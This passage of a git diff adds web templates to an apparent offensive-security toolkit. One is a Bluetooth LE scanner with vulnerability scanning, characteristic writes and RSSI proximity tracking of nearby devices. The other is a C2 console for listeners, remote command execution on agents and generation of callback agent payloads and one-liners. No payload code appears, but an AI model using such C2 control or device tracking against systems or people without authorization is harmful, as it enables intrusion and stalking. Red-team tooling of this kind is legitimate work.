<li><a href="{{ url_for('ipcapture.index') }}" class="{% if request.blueprint == 'ipcapture' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ IP Capture</a></li>
|
||||
<li><a href="{{ url_for('simulate.index') }}" class="{% if request.blueprint == 'simulate' and request.endpoint != 'simulate.legendary_creator' %}active{% endif %}">Simulate</a></li>
|
||||
<li><a href="{{ url_for('simulate.legendary_creator') }}" class="{% if request.endpoint == 'simulate.legendary_creator' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Legendary Creator</a></li>
|
||||
</ul>
|
||||
@ -69,6 +89,8 @@
|
||||
<li><a href="{{ url_for('upnp.index') }}" class="{% if request.blueprint == 'upnp' %}active{% endif %}">UPnP</a></li>
|
||||
<li><a href="{{ url_for('wireguard.index') }}" class="{% if request.blueprint == 'wireguard' %}active{% endif %}">WireGuard</a></li>
|
||||
<li><a href="{{ url_for('msf.index') }}" class="{% if request.blueprint == 'msf' %}active{% endif %}">MSF Console</a></li>
|
||||
<li><a href="{{ url_for('dns_service.index') }}" class="{% if request.blueprint == 'dns_service' and request.endpoint != 'dns_service.nameserver' %}active{% endif %}">DNS Server</a></li>
|
||||
<li><a href="{{ url_for('dns_service.nameserver') }}" class="{% if request.endpoint == 'dns_service.nameserver' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Nameserver</a></li>
|
||||
<li><a href="{{ url_for('settings.index') }}" class="{% if request.blueprint == 'settings' and request.endpoint not in ('settings.llm_settings', 'settings.deps_index') %}active{% endif %}">Settings</a></li>
|
||||
<li><a href="{{ url_for('settings.llm_settings') }}" class="{% if request.endpoint == 'settings.llm_settings' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ LLM Config</a></li>
|
||||
<li><a href="{{ url_for('settings.deps_index') }}" class="{% if request.endpoint == 'settings.deps_index' %}active{% endif %}" style="padding-left:1.5rem;font-size:0.85rem">└ Dependencies</a></li>
|
||||
|
||||
515
web/templates/ble_scanner.html
Normal file
515
web/templates/ble_scanner.html
Normal file
@ -0,0 +1,515 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — BLE Scanner{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>BLE Scanner</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Bluetooth Low Energy device discovery, service enumeration, and characteristic inspection.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="ble" data-tab="scan" onclick="showTab('ble','scan')">Scan</button>
|
||||
<button class="tab" data-tab-group="ble" data-tab="device" onclick="showTab('ble','device')">Device Detail</button>
|
||||
</div>
|
||||
|
||||
<!-- ══ Scan Tab ══ -->
|
||||
<div class="tab-content active" data-tab-group="ble" data-tab="scan">
|
||||
|
||||
<!-- Scan Controls -->
|
||||
<div class="section">
|
||||
<h2>BLE Scan</h2>
|
||||
<div class="form-row" style="align-items:flex-end">
|
||||
<div class="form-group" style="max-width:160px">
|
||||
<label>Duration (seconds)</label>
|
||||
<input type="number" id="ble-scan-duration" value="10" min="1" max="60">
|
||||
</div>
|
||||
<div class="form-group" style="flex:0;margin-bottom:16px">
|
||||
<button id="btn-ble-scan" class="btn btn-primary" onclick="bleScan()">Scan</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="display:flex;align-items:center;gap:8px;margin-bottom:12px">
|
||||
<span class="status-dot" id="ble-bleak-dot"></span>
|
||||
<span id="ble-bleak-status" style="font-size:0.85rem;color:var(--text-secondary)">Checking bleak availability...</span>
|
||||
</div>
|
||||
<div id="ble-scan-status" class="progress-text"></div>
|
||||
</div>
|
||||
|
||||
<!-- Discovered Devices -->
|
||||
<div class="section">
|
||||
<h2>Discovered Devices</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="bleVulnScan()">Vuln Scan All</button>
|
||||
<button class="btn btn-small" onclick="bleSaveScan()">Save Scan</button>
|
||||
<button class="btn btn-small" onclick="bleClearDevices()">Clear</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Address</th>
|
||||
<th>Name</th>
|
||||
<th>RSSI</th>
|
||||
<th>Type</th>
|
||||
<th>Manufacturer</th>
|
||||
<th>Services</th>
|
||||
<th></th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="ble-devices-body">
|
||||
<tr><td colspan="7" class="empty-state">No devices found. Run a scan to discover BLE devices.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<!-- Saved Scans -->
|
||||
<div class="section">
|
||||
<h2>Saved Scans</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="bleLoadSavedScans()">Refresh</button>
|
||||
</div>
|
||||
<div id="ble-saved-scans">
|
||||
<p class="empty-state" style="padding:12px;font-size:0.85rem">No saved scans.</p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- ══ Device Detail Tab ══ -->
|
||||
<div class="tab-content" data-tab-group="ble" data-tab="device">
|
||||
|
||||
<!-- Device Selector -->
|
||||
<div class="section">
|
||||
<h2>Device Connection</h2>
|
||||
<div class="form-row" style="align-items:flex-end">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Device</label>
|
||||
<select id="ble-device-select">
|
||||
<option value="">-- scan for devices first --</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" style="flex:0;margin-bottom:16px">
|
||||
<button id="btn-ble-connect" class="btn btn-primary" onclick="bleConnect()">Connect</button>
|
||||
</div>
|
||||
<div class="form-group" style="flex:0;margin-bottom:16px">
|
||||
<button id="btn-ble-disconnect" class="btn btn-stop btn-small" onclick="bleDisconnect()" style="display:none">Disconnect</button>
|
||||
</div>
|
||||
</div>
|
||||
<div id="ble-connect-status" class="progress-text"></div>
|
||||
</div>
|
||||
|
||||
<!-- Services Tree -->
|
||||
<div class="section">
|
||||
<h2>Services & Characteristics</h2>
|
||||
<div id="ble-services-tree">
|
||||
<p class="empty-state" style="padding:12px;font-size:0.85rem">Connect to a device to view its GATT services.</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Proximity Tracking -->
|
||||
<div class="section">
|
||||
<h2>Proximity Tracking</h2>
|
||||
<div class="form-row" style="align-items:flex-end">
|
||||
<div class="form-group" style="flex:0;margin-bottom:16px">
|
||||
<button id="btn-ble-track" class="btn btn-primary btn-small" onclick="bleStartTracking()">Start Tracking</button>
|
||||
</div>
|
||||
<div class="form-group" style="flex:0;margin-bottom:16px">
|
||||
<button id="btn-ble-track-stop" class="btn btn-stop btn-small" onclick="bleStopTracking()" style="display:none">Stop</button>
|
||||
</div>
|
||||
</div>
|
||||
<div style="display:flex;gap:24px;align-items:flex-start;flex-wrap:wrap">
|
||||
<div>
|
||||
<div style="font-size:0.85rem;color:var(--text-secondary);margin-bottom:4px">Estimated Distance</div>
|
||||
<div id="ble-distance" style="font-size:2rem;font-weight:700;color:var(--accent)">-- m</div>
|
||||
<div id="ble-rssi-current" style="font-size:0.85rem;color:var(--text-muted)">RSSI: --</div>
|
||||
</div>
|
||||
<div style="flex:1;min-width:300px">
|
||||
<div style="font-size:0.85rem;color:var(--text-secondary);margin-bottom:4px">RSSI History</div>
|
||||
<div id="ble-rssi-chart" style="background:var(--bg-primary);border:1px solid var(--border);border-radius:var(--radius);height:120px;position:relative;overflow:hidden">
|
||||
<canvas id="ble-rssi-canvas" style="width:100%;height:100%"></canvas>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Tracking History -->
|
||||
<div class="section">
|
||||
<h2>Tracking History</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="bleClearHistory()">Clear</button>
|
||||
<button class="btn btn-small" onclick="bleExportHistory()">Export</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Timestamp</th>
|
||||
<th>Address</th>
|
||||
<th>RSSI</th>
|
||||
<th>Distance (m)</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="ble-history-body">
|
||||
<tr><td colspan="4" class="empty-state">No tracking history.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
/* ── BLE Scanner ── */
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
var bleDevices = [];
|
||||
var bleTrackInterval = null;
|
||||
var bleTrackHistory = [];
|
||||
var bleRssiData = [];
|
||||
|
||||
/* ── Init ── */
|
||||
document.addEventListener('DOMContentLoaded', function() {
|
||||
bleCheckBleak();
|
||||
bleLoadSavedScans();
|
||||
});
|
||||
|
||||
function bleCheckBleak() {
|
||||
fetchJSON('/ble/status').then(function(data) {
|
||||
var dot = document.getElementById('ble-bleak-dot');
|
||||
var txt = document.getElementById('ble-bleak-status');
|
||||
if (data.bleak_available) {
|
||||
dot.className = 'status-dot active';
|
||||
txt.textContent = 'bleak available — ready to scan';
|
||||
} else {
|
||||
dot.className = 'status-dot inactive';
|
||||
txt.textContent = 'bleak not available — install with: pip install bleak';
|
||||
}
|
||||
}).catch(function() {
|
||||
document.getElementById('ble-bleak-dot').className = 'status-dot inactive';
|
||||
document.getElementById('ble-bleak-status').textContent = 'Could not check bleak status';
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Scan Tab ── */
|
||||
function bleScan() {
|
||||
var duration = parseInt(document.getElementById('ble-scan-duration').value) || 10;
|
||||
var btn = document.getElementById('btn-ble-scan');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('ble-scan-status').textContent = 'Scanning for ' + duration + ' seconds...';
|
||||
postJSON('/ble/scan', {duration: duration}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('ble-scan-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
bleDevices = data.devices || [];
|
||||
document.getElementById('ble-scan-status').textContent = 'Found ' + bleDevices.length + ' device(s)';
|
||||
bleRenderDevices();
|
||||
bleUpdateDeviceSelector();
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function bleRenderDevices() {
|
||||
var tbody = document.getElementById('ble-devices-body');
|
||||
if (!bleDevices.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="7" class="empty-state">No devices found.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
bleDevices.forEach(function(d, i) {
|
||||
var rssiColor = d.rssi > -50 ? 'var(--success,#4ade80)' : d.rssi > -70 ? 'var(--warning,#f59e0b)' : 'var(--danger)';
|
||||
html += '<tr>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem">' + esc(d.address || '') + '</td>'
|
||||
+ '<td>' + esc(d.name || 'Unknown') + '</td>'
|
||||
+ '<td style="color:' + rssiColor + '">' + esc(String(d.rssi || '—')) + ' dBm</td>'
|
||||
+ '<td>' + esc(d.type || '—') + '</td>'
|
||||
+ '<td>' + esc(d.manufacturer || '—') + '</td>'
|
||||
+ '<td>' + (d.services_count || 0) + '</td>'
|
||||
+ '<td><button class="btn btn-small" onclick="bleInspectDevice(' + i + ')">Inspect</button></td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function bleUpdateDeviceSelector() {
|
||||
var sel = document.getElementById('ble-device-select');
|
||||
sel.innerHTML = '<option value="">-- select a device --</option>';
|
||||
bleDevices.forEach(function(d) {
|
||||
var opt = document.createElement('option');
|
||||
opt.value = d.address;
|
||||
opt.textContent = (d.name || 'Unknown') + ' (' + d.address + ') [' + d.rssi + ' dBm]';
|
||||
sel.appendChild(opt);
|
||||
});
|
||||
}
|
||||
|
||||
function bleInspectDevice(idx) {
|
||||
var d = bleDevices[idx];
|
||||
if (!d) return;
|
||||
document.getElementById('ble-device-select').value = d.address;
|
||||
showTab('ble', 'device');
|
||||
}
|
||||
|
||||
function bleVulnScan() {
|
||||
if (!bleDevices.length) return;
|
||||
var addresses = bleDevices.map(function(d) { return d.address; });
|
||||
document.getElementById('ble-scan-status').textContent = 'Running vulnerability scan on ' + addresses.length + ' device(s)...';
|
||||
postJSON('/ble/vuln-scan', {addresses: addresses}).then(function(data) {
|
||||
if (data.error) {
|
||||
document.getElementById('ble-scan-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
var vulnCount = (data.vulnerabilities || []).length;
|
||||
document.getElementById('ble-scan-status').textContent = 'Vuln scan complete — ' + vulnCount + ' issue(s) found';
|
||||
if (vulnCount && data.vulnerabilities) {
|
||||
data.vulnerabilities.forEach(function(v) {
|
||||
var dev = bleDevices.find(function(d) { return d.address === v.address; });
|
||||
if (dev) dev.vuln = v.description;
|
||||
});
|
||||
bleRenderDevices();
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
function bleSaveScan() {
|
||||
if (!bleDevices.length) return;
|
||||
postJSON('/ble/save-scan', {devices: bleDevices}).then(function(data) {
|
||||
if (data.error) {
|
||||
document.getElementById('ble-scan-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
document.getElementById('ble-scan-status').textContent = 'Scan saved: ' + (data.filename || 'OK');
|
||||
bleLoadSavedScans();
|
||||
});
|
||||
}
|
||||
|
||||
function bleLoadSavedScans() {
|
||||
fetchJSON('/ble/saved-scans').then(function(data) {
|
||||
var container = document.getElementById('ble-saved-scans');
|
||||
var scans = data.scans || [];
|
||||
if (!scans.length) {
|
||||
container.innerHTML = '<p class="empty-state" style="padding:12px;font-size:0.85rem">No saved scans.</p>';
|
||||
return;
|
||||
}
|
||||
var html = '<table class="data-table"><thead><tr><th>Timestamp</th><th>Devices</th><th></th></tr></thead><tbody>';
|
||||
scans.forEach(function(s) {
|
||||
html += '<tr>'
|
||||
+ '<td>' + esc(s.timestamp || '') + '</td>'
|
||||
+ '<td>' + (s.device_count || 0) + '</td>'
|
||||
+ '<td><button class="btn btn-small" onclick="bleLoadScan(\'' + esc(s.id || '') + '\')">Load</button></td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
html += '</tbody></table>';
|
||||
container.innerHTML = html;
|
||||
}).catch(function() {});
|
||||
}
|
||||
|
||||
function bleLoadScan(id) {
|
||||
fetchJSON('/ble/saved-scans/' + encodeURIComponent(id)).then(function(data) {
|
||||
if (data.error) return;
|
||||
bleDevices = data.devices || [];
|
||||
bleRenderDevices();
|
||||
bleUpdateDeviceSelector();
|
||||
document.getElementById('ble-scan-status').textContent = 'Loaded saved scan: ' + (data.timestamp || id);
|
||||
});
|
||||
}
|
||||
|
||||
function bleClearDevices() {
|
||||
bleDevices = [];
|
||||
bleRenderDevices();
|
||||
bleUpdateDeviceSelector();
|
||||
document.getElementById('ble-scan-status').textContent = '';
|
||||
}
|
||||
|
||||
/* ── Device Detail Tab ── */
|
||||
function bleConnect() {
|
||||
var addr = document.getElementById('ble-device-select').value;
|
||||
if (!addr) return;
|
||||
var btn = document.getElementById('btn-ble-connect');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('ble-connect-status').textContent = 'Connecting to ' + addr + '...';
|
||||
postJSON('/ble/connect', {address: addr}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('ble-connect-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
document.getElementById('ble-connect-status').textContent = 'Connected to ' + addr;
|
||||
document.getElementById('btn-ble-disconnect').style.display = '';
|
||||
bleRenderServices(data.services || []);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function bleDisconnect() {
|
||||
var addr = document.getElementById('ble-device-select').value;
|
||||
postJSON('/ble/disconnect', {address: addr}).then(function(data) {
|
||||
document.getElementById('ble-connect-status').textContent = 'Disconnected';
|
||||
document.getElementById('btn-ble-disconnect').style.display = 'none';
|
||||
document.getElementById('ble-services-tree').innerHTML = '<p class="empty-state" style="padding:12px;font-size:0.85rem">Connect to a device to view its GATT services.</p>';
|
||||
});
|
||||
}
|
||||
|
||||
function bleRenderServices(services) {
|
||||
var container = document.getElementById('ble-services-tree');
|
||||
if (!services.length) {
|
||||
container.innerHTML = '<p class="empty-state" style="padding:12px;font-size:0.85rem">No services found on this device.</p>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
services.forEach(function(svc, si) {
|
||||
html += '<div style="background:var(--bg-card);border:1px solid var(--border);border-radius:var(--radius);padding:12px;margin-bottom:8px">';
|
||||
html += '<div style="font-weight:600;font-size:0.9rem;margin-bottom:8px">'
|
||||
+ '<span style="color:var(--accent)">' + esc(svc.uuid || '') + '</span>'
|
||||
+ (svc.name ? ' <span style="color:var(--text-secondary);font-weight:400">(' + esc(svc.name) + ')</span>' : '')
|
||||
+ '</div>';
|
||||
if (svc.characteristics && svc.characteristics.length) {
|
||||
svc.characteristics.forEach(function(ch, ci) {
|
||||
var charId = 'ble-char-' + si + '-' + ci;
|
||||
html += '<div style="margin-left:16px;padding:8px 0;border-top:1px solid var(--border)">';
|
||||
html += '<div style="display:flex;align-items:center;gap:8px;flex-wrap:wrap">';
|
||||
html += '<span style="font-family:monospace;font-size:0.8rem">' + esc(ch.uuid || '') + '</span>';
|
||||
if (ch.name) html += '<span style="font-size:0.8rem;color:var(--text-secondary)">(' + esc(ch.name) + ')</span>';
|
||||
var props = (ch.properties || []).join(', ');
|
||||
if (props) html += '<span class="badge" style="background:rgba(99,102,241,0.15);color:var(--accent)">' + esc(props) + '</span>';
|
||||
html += '</div>';
|
||||
html += '<div style="display:flex;align-items:center;gap:6px;margin-top:6px">';
|
||||
html += '<span id="' + charId + '-val" style="font-family:monospace;font-size:0.8rem;color:var(--text-muted)">'
|
||||
+ (ch.value ? esc(ch.value) : '(not read)') + '</span>';
|
||||
if ((ch.properties || []).indexOf('read') >= 0 || (ch.properties || []).indexOf('Read') >= 0) {
|
||||
html += '<button class="btn btn-small" style="padding:2px 8px;font-size:0.7rem" onclick="bleReadChar(\'' + esc(ch.uuid) + '\',\'' + charId + '\')">Read</button>';
|
||||
}
|
||||
if ((ch.properties || []).indexOf('write') >= 0 || (ch.properties || []).indexOf('Write') >= 0) {
|
||||
html += '<input type="text" id="' + charId + '-input" placeholder="hex value" style="width:120px;padding:3px 6px;font-size:0.8rem;background:var(--bg-input);border:1px solid var(--border);border-radius:4px;color:var(--text-primary)">';
|
||||
html += '<button class="btn btn-small" style="padding:2px 8px;font-size:0.7rem" onclick="bleWriteChar(\'' + esc(ch.uuid) + '\',\'' + charId + '\')">Write</button>';
|
||||
}
|
||||
html += '</div>';
|
||||
html += '</div>';
|
||||
});
|
||||
}
|
||||
html += '</div>';
|
||||
});
|
||||
container.innerHTML = html;
|
||||
}
|
||||
|
||||
function bleReadChar(uuid, elemId) {
|
||||
var addr = document.getElementById('ble-device-select').value;
|
||||
postJSON('/ble/read', {address: addr, characteristic: uuid}).then(function(data) {
|
||||
var el = document.getElementById(elemId + '-val');
|
||||
if (data.error) { if (el) el.textContent = 'Error: ' + data.error; return; }
|
||||
if (el) el.textContent = data.value || '(empty)';
|
||||
});
|
||||
}
|
||||
|
||||
function bleWriteChar(uuid, elemId) {
|
||||
var addr = document.getElementById('ble-device-select').value;
|
||||
var input = document.getElementById(elemId + '-input');
|
||||
var val = input ? input.value.trim() : '';
|
||||
if (!val) return;
|
||||
postJSON('/ble/write', {address: addr, characteristic: uuid, value: val}).then(function(data) {
|
||||
var el = document.getElementById(elemId + '-val');
|
||||
if (data.error) { if (el) el.textContent = 'Error: ' + data.error; return; }
|
||||
if (el) el.textContent = 'Written: ' + val;
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Proximity Tracking ── */
|
||||
function bleStartTracking() {
|
||||
var addr = document.getElementById('ble-device-select').value;
|
||||
if (!addr) { document.getElementById('ble-connect-status').textContent = 'Select a device first'; return; }
|
||||
document.getElementById('btn-ble-track').style.display = 'none';
|
||||
document.getElementById('btn-ble-track-stop').style.display = '';
|
||||
bleRssiData = [];
|
||||
bleTrackInterval = setInterval(function() { bleTrackPoll(addr); }, 1000);
|
||||
}
|
||||
|
||||
function bleStopTracking() {
|
||||
if (bleTrackInterval) { clearInterval(bleTrackInterval); bleTrackInterval = null; }
|
||||
document.getElementById('btn-ble-track').style.display = '';
|
||||
document.getElementById('btn-ble-track-stop').style.display = 'none';
|
||||
}
|
||||
|
||||
function bleTrackPoll(addr) {
|
||||
fetchJSON('/ble/rssi?address=' + encodeURIComponent(addr)).then(function(data) {
|
||||
if (data.error) return;
|
||||
var rssi = data.rssi || -100;
|
||||
var distance = bleEstimateDistance(rssi);
|
||||
document.getElementById('ble-distance').textContent = distance.toFixed(1) + ' m';
|
||||
document.getElementById('ble-rssi-current').textContent = 'RSSI: ' + rssi + ' dBm';
|
||||
|
||||
bleRssiData.push(rssi);
|
||||
if (bleRssiData.length > 60) bleRssiData.shift();
|
||||
bleDrawRssiChart();
|
||||
|
||||
var entry = {
|
||||
timestamp: new Date().toISOString().replace('T', ' ').substring(0, 19),
|
||||
address: addr,
|
||||
rssi: rssi,
|
||||
distance: distance.toFixed(1)
|
||||
};
|
||||
bleTrackHistory.push(entry);
|
||||
bleRenderHistory();
|
||||
});
|
||||
}
|
||||
|
||||
function bleEstimateDistance(rssi) {
|
||||
/* Approximate using log-distance path loss model, txPower ~ -59 dBm at 1m */
|
||||
var txPower = -59;
|
||||
if (rssi === 0) return -1;
|
||||
var ratio = rssi / txPower;
|
||||
if (ratio < 1.0) return Math.pow(ratio, 10);
|
||||
return 0.89976 * Math.pow(ratio, 7.7095) + 0.111;
|
||||
}
|
||||
|
||||
function bleDrawRssiChart() {
|
||||
var canvas = document.getElementById('ble-rssi-canvas');
|
||||
if (!canvas) return;
|
||||
var ctx = canvas.getContext('2d');
|
||||
var w = canvas.parentElement.offsetWidth;
|
||||
var h = canvas.parentElement.offsetHeight;
|
||||
canvas.width = w;
|
||||
canvas.height = h;
|
||||
ctx.clearRect(0, 0, w, h);
|
||||
|
||||
if (bleRssiData.length < 2) return;
|
||||
|
||||
var minR = -100, maxR = -20;
|
||||
ctx.strokeStyle = '#6366f1';
|
||||
ctx.lineWidth = 2;
|
||||
ctx.beginPath();
|
||||
for (var i = 0; i < bleRssiData.length; i++) {
|
||||
var x = (i / (bleRssiData.length - 1)) * w;
|
||||
var y = h - ((bleRssiData[i] - minR) / (maxR - minR)) * h;
|
||||
if (i === 0) ctx.moveTo(x, y); else ctx.lineTo(x, y);
|
||||
}
|
||||
ctx.stroke();
|
||||
}
|
||||
|
||||
function bleRenderHistory() {
|
||||
var tbody = document.getElementById('ble-history-body');
|
||||
if (!bleTrackHistory.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="4" class="empty-state">No tracking history.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
var start = Math.max(0, bleTrackHistory.length - 50);
|
||||
for (var i = bleTrackHistory.length - 1; i >= start; i--) {
|
||||
var e = bleTrackHistory[i];
|
||||
html += '<tr>'
|
||||
+ '<td style="font-size:0.8rem">' + esc(e.timestamp) + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem">' + esc(e.address) + '</td>'
|
||||
+ '<td>' + esc(String(e.rssi)) + ' dBm</td>'
|
||||
+ '<td>' + esc(e.distance) + '</td>'
|
||||
+ '</tr>';
|
||||
}
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function bleClearHistory() {
|
||||
bleTrackHistory = [];
|
||||
bleRenderHistory();
|
||||
}
|
||||
|
||||
function bleExportHistory() {
|
||||
var blob = new Blob([JSON.stringify(bleTrackHistory, null, 2)], {type: 'application/json'});
|
||||
var a = document.createElement('a');
|
||||
a.href = URL.createObjectURL(blob);
|
||||
a.download = 'ble_tracking_history.json';
|
||||
a.click();
|
||||
}
|
||||
</script>
|
||||
{% endblock %}
|
||||
260
web/templates/c2_framework.html
Normal file
260
web/templates/c2_framework.html
Normal file
@ -0,0 +1,260 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}C2 Framework — AUTARCH{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>C2 Framework</h1>
|
||||
<p class="text-muted">Command & Control — listeners, agents, task queue</p>
|
||||
</div>
|
||||
|
||||
<div class="tabs">
|
||||
<button class="tab active" onclick="switchTab('dashboard')">Dashboard</button>
|
||||
<button class="tab" onclick="switchTab('agents')">Agents <span id="agent-badge" class="badge" style="display:none">0</span></button>
|
||||
<button class="tab" onclick="switchTab('generate')">Generate</button>
|
||||
</div>
|
||||
|
||||
<!-- Dashboard -->
|
||||
<div id="tab-dashboard" class="tab-content active">
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:1rem">
|
||||
<div class="card">
|
||||
<h3>Listeners</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end;margin-bottom:1rem">
|
||||
<input type="text" id="ls-name" class="form-control" placeholder="name" style="width:120px">
|
||||
<input type="number" id="ls-port" class="form-control" placeholder="4444" value="4444" style="width:100px">
|
||||
<button class="btn btn-primary btn-sm" onclick="startListener()">Start</button>
|
||||
</div>
|
||||
<div id="listeners-list"></div>
|
||||
</div>
|
||||
<div class="card">
|
||||
<h3>Active Agents</h3>
|
||||
<div id="dash-agents"></div>
|
||||
</div>
|
||||
</div>
|
||||
<div class="card" style="margin-top:1rem">
|
||||
<h3>Recent Tasks</h3>
|
||||
<div id="dash-tasks"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Agents -->
|
||||
<div id="tab-agents" class="tab-content" style="display:none">
|
||||
<div id="agent-list"></div>
|
||||
<!-- Agent Interaction -->
|
||||
<div id="agent-shell" class="card" style="margin-top:1rem;display:none">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<h3>Agent: <span id="shell-agent-id" style="color:var(--accent)"></span></h3>
|
||||
<div>
|
||||
<button class="btn btn-sm" onclick="agentSysinfo()">Sysinfo</button>
|
||||
<button class="btn btn-sm" style="color:var(--danger)" onclick="document.getElementById('agent-shell').style.display='none'">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
<div id="agent-output" style="background:#0a0a0a;color:#0f0;font-family:monospace;font-size:0.8rem;
|
||||
padding:1rem;border-radius:var(--radius);height:350px;overflow-y:auto;white-space:pre-wrap;margin:0.5rem 0"></div>
|
||||
<div style="display:flex;gap:0.5rem">
|
||||
<input type="text" id="agent-cmd" class="form-control" placeholder="Command..." style="font-family:monospace"
|
||||
onkeypress="if(event.key==='Enter')agentExec()">
|
||||
<button class="btn btn-primary" onclick="agentExec()">Run</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Generate -->
|
||||
<div id="tab-generate" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:700px">
|
||||
<h3>Generate Agent Payload</h3>
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.5rem">
|
||||
<div class="form-group"><label>Callback Host</label>
|
||||
<input type="text" id="gen-host" class="form-control" placeholder="your-ip"></div>
|
||||
<div class="form-group"><label>Callback Port</label>
|
||||
<input type="number" id="gen-port" class="form-control" value="4444"></div>
|
||||
<div class="form-group"><label>Agent Type</label>
|
||||
<select id="gen-type" class="form-control">
|
||||
<option value="python">Python</option>
|
||||
<option value="bash">Bash</option>
|
||||
<option value="powershell">PowerShell</option>
|
||||
</select></div>
|
||||
<div class="form-group"><label>Beacon Interval (sec)</label>
|
||||
<input type="number" id="gen-interval" class="form-control" value="5"></div>
|
||||
</div>
|
||||
<div style="display:flex;gap:0.5rem;margin-top:0.5rem">
|
||||
<button class="btn btn-primary" onclick="generateAgent()">Generate Agent</button>
|
||||
<button class="btn" onclick="getOneliner()">Get One-Liner</button>
|
||||
</div>
|
||||
<div id="gen-result" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<style>
|
||||
.badge{display:inline-block;background:var(--danger);color:#fff;border-radius:10px;padding:0 6px;font-size:0.7rem;margin-left:4px;vertical-align:top}
|
||||
.agent-status-active{color:#22c55e}.agent-status-stale{color:#f59e0b}.agent-status-dead{color:var(--danger)}
|
||||
.spinner-inline{display:inline-block;width:14px;height:14px;border:2px solid var(--border);border-top-color:var(--accent);border-radius:50%;animation:spin 0.8s linear infinite;vertical-align:middle;margin-right:6px}
|
||||
@keyframes spin{to{transform:rotate(360deg)}}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
let currentAgentId=null;
|
||||
let refreshTimer=null;
|
||||
|
||||
function switchTab(name){
|
||||
document.querySelectorAll('.tab').forEach((t,i)=>t.classList.toggle('active',['dashboard','agents','generate'][i]===name));
|
||||
document.querySelectorAll('.tab-content').forEach(c=>c.style.display='none');
|
||||
document.getElementById('tab-'+name).style.display='';
|
||||
if(name==='dashboard'||name==='agents') refreshDashboard();
|
||||
}
|
||||
|
||||
function refreshDashboard(){
|
||||
fetch('/c2/listeners').then(r=>r.json()).then(d=>{
|
||||
const list=document.getElementById('listeners-list');
|
||||
const ls=d.listeners||[];
|
||||
list.innerHTML=ls.length?ls.map(l=>`<div style="display:flex;justify-content:space-between;align-items:center;padding:4px 0;border-bottom:1px solid var(--border)">
|
||||
<div><strong>${esc(l.name)}</strong> — ${l.host}:${l.port} (${l.connections} conn)</div>
|
||||
<button class="btn btn-sm" style="color:var(--danger)" onclick="stopListener('${esc(l.name)}')">Stop</button>
|
||||
</div>`).join(''):'<div style="color:var(--text-muted);font-size:0.85rem">No listeners running</div>';
|
||||
});
|
||||
|
||||
